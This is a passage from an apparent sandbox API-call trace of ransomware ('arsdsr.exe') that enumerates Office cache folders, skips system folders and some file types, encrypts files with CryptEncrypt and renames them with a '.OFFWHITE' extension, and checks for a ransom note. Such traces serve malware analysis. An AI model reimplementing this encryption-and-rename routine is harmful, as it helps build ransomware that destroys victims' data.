lpString2="KERNEL32.DLL") returned 0 [0084.244] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.244] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x567, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.244] SetLastError (dwErrCode=0x0) [0084.244] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.267] GetLastError () returned 0x0 [0084.267] GetLastError () returned 0x0 [0084.267] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x667, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.267] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.268] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x767, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.268] WriteFile (in: hFile=0x21c, lpBuffer=0x52be70*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52be70*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.268] GetProcessHeap () returned 0x500000 [0084.268] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x567) returned 0x52e7e8 [0084.268] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.268] ReadFile (in: hFile=0x21c, lpBuffer=0x52e7e8, nNumberOfBytesToRead=0x567, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52e7e8*, lpNumberOfBytesRead=0x295e540*=0x567, lpOverlapped=0x0) returned 1 [0084.268] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.268] WriteFile (in: hFile=0x21c, lpBuffer=0x52e7e8*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52e7e8*, lpNumberOfBytesWritten=0x295e54c*=0x567, lpOverlapped=0x0) returned 1 [0084.268] GetProcessHeap () returned 0x500000 [0084.268] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52e7e8 | out: hHeap=0x500000) returned 1 [0084.268] CloseHandle (hObject=0x21c) returned 1 [0084.270] GetProcessHeap () returned 0x500000 [0084.270] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.270] GetProcessHeap () returned 0x500000 [0084.270] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.270] GetProcessHeap () returned 0x500000 [0084.270] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.270] GetProcessHeap () returned 0x500000 [0084.270] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.270] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" [0084.270] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.OFFWHITE" [0084.270] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.offwhite")) returned 1 [0084.271] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2=".") returned 1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="..") returned 1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="...") returned 1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="windows") returned -1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="$recycle.bin") returned 1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="rsa") returned -1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="ntuser.dat") returned 1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="programdata") returned -1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="appdata") returned 1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="program files") returned -1 [0084.271] lstrcmpiW (lpString1="OWOW32LR.cab", lpString2="program files (x86)") returned -1 [0084.271] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" [0084.271] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="OWOW32LR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" [0084.272] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.272] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.272] PathFindExtensionW (pszPath="OWOW32LR.cab") returned=".cab" [0084.272] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0084.272] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0084.272] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0084.272] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0084.272] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0084.272] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" [0084.272] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.272] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.272] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.272] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0084.272] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.272] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.273] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.273] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.273] GetProcessHeap () returned 0x500000 [0084.273] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be80 [0084.273] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.274] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=2362) returned 1 [0084.274] GetProcessHeap () returned 0x500000 [0084.274] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.274] GetProcessHeap () returned 0x500000 [0084.274] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.274] GetProcessHeap () returned 0x500000 [0084.274] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.274] GetProcessHeap () returned 0x500000 [0084.274] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.274] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.274] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.274] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.274] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.274] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.274] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.274] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.274] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.274] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.275] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.275] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.275] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.275] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x93a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.275] SetLastError (dwErrCode=0x0) [0084.275] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.357] GetLastError () returned 0x0 [0084.357] GetLastError () returned 0x0 [0084.358] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.358] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.358] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.358] WriteFile (in: hFile=0x21c, lpBuffer=0x52be80*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52be80*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.358] GetProcessHeap () returned 0x500000 [0084.358] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x93a) returned 0x526640 [0084.358] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.358] ReadFile (in: hFile=0x21c, lpBuffer=0x526640, nNumberOfBytesToRead=0x93a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesRead=0x295e540*=0x93a, lpOverlapped=0x0) returned 1 [0084.358] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.358] WriteFile (in: hFile=0x21c, lpBuffer=0x526640*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesWritten=0x295e54c*=0x93a, lpOverlapped=0x0) returned 1 [0084.358] GetProcessHeap () returned 0x500000 [0084.359] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x526640 | out: hHeap=0x500000) returned 1 [0084.359] CloseHandle (hObject=0x21c) returned 1 [0084.360] GetProcessHeap () returned 0x500000 [0084.360] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.360] GetProcessHeap () returned 0x500000 [0084.360] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.360] GetProcessHeap () returned 0x500000 [0084.361] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.361] GetProcessHeap () returned 0x500000 [0084.361] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.361] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.361] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0084.361] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0084.362] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0084.362] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0084.362] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0084.362] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0084.362] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0084.362] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-0044-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C" [0084.362] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" [0084.362] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" [0084.362] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" [0084.362] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0084.393] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.393] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0084.393] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.393] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.393] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0084.393] lstrcmpiW (lpString1="InfLR.cab", lpString2=".") returned 1 [0084.393] lstrcmpiW (lpString1="InfLR.cab", lpString2="..") returned 1 [0084.393] lstrcmpiW (lpString1="InfLR.cab", lpString2="...") returned 1 [0084.393] lstrcmpiW (lpString1="InfLR.cab", lpString2="windows") returned -1 [0084.394] lstrcmpiW (lpString1="InfLR.cab", lpString2="$recycle.bin") returned 1 [0084.394] lstrcmpiW (lpString1="InfLR.cab", lpString2="rsa") returned -1 [0084.394] lstrcmpiW (lpString1="InfLR.cab", lpString2="ntuser.dat") returned -1 [0084.394] lstrcmpiW (lpString1="InfLR.cab", lpString2="programdata") returned -1 [0084.394] lstrcmpiW (lpString1="InfLR.cab", lpString2="appdata") returned 1 [0084.394] lstrcmpiW (lpString1="InfLR.cab", lpString2="program files") returned -1 [0084.394] lstrcmpiW (lpString1="InfLR.cab", lpString2="program files (x86)") returned -1 [0084.394] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\" [0084.394] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpString2="InfLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned="C:/MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" [0084.394] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.394] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.394] PathFindExtensionW (pszPath="InfLR.cab") returned=".cab" [0084.394] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0084.394] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0084.394] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0084.394] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0084.394] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2=".") returned 1 [0084.394] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="..") returned 1 [0084.394] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="...") returned 1 [0084.394] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="windows") returned -1 [0084.394] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="$recycle.bin") returned 1 [0084.394] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="rsa") returned -1 [0084.394] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="ntuser.dat") returned -1 [0084.394] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="programdata") returned -1 [0084.395] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="appdata") returned 1 [0084.395] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="program files") returned -1 [0084.395] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="program files (x86)") returned -1 [0084.395] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All 